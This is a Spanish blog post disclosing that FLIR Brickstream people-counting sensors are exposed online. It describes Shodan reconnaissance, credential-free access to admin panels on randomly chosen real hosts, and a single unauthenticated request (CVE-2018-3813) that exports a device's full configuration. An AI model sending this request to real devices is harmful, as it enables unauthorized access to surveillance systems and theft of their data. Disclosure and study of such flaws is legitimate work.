lunes, 1 de enero de 2018

BRICKSTREAM; "RECUENTO Y SEGUIMIENTO DE PERSONAS"

Temas como [hiper]vigilancia, privacidad, anonimato son temas que a muchas personas les preocupa y yo no soy ajeno a ello. Me picaba el tema y me puse a buscar ejemplos funcionales de seguimiento.

Los primero que me tope (ya lo sabíamos) eran los chinos, mirando todo (con cara de sospecha XD ):












Recorde que entre los distintos ejercicios sondeando Internet con @bertinjoseb en busca de nuevos #cacharros dimos con algunos sensores que se encargan justamente de "Trackear" todo lo que se mueve (personas), tome nota del hallazgo y lo guarde, hasta hoy 1 de enero del 2018.

El hallazgo corresponde a "Brickstream" devices de la firma FLIR y su portal web los presenta de esta manera: BRICKSTREAM; "RECUENTO Y SEGUIMIENTO DE PERSONAS"



Se promocionan como lideres de la solución. En donde aseguran tener desplegados mas de 200.000 sensores para el recuento y seguimiento de personas.

Video  institucional:



Aspecto de los dispositivos según su modelo:



Cacharros On the Wild:
Me valgo de la indexaciones de shodan para calcular un numero aproximado de exposición (contra los supuestos 200k)  de cara a internet.




De las 54 posibilidades (Indexadas) al azar fui probando los distintos host y  hasta ahora en ningún caso encontré necesidad de credenciales para acceder al la administración de los equipos. y en gran mayoria están expuestos a Internet sin seguridad alguna. Solo necesitamos el host y el puerto correspondiente, que podrán ser; 80,443,8080,8081.

Aspecto web del panal de administración.


*** KARAMA BATMAN PARK *** 

Ahora sabemos donde esta instalado este equipo.



Tomemos toda su configuración !



Obtén toda la configuración del equipo  (CVE-2018-3813)

GET /getConfigExportFile.cgi HTTP/1.1

POC 1


POC 2



... y te haces con toda la configuración de estos equipos.








HOST EXPUESTOS VULNERABLES:


Saludos
@Capitan_alfa

No hay comentarios.:

Publicar un comentario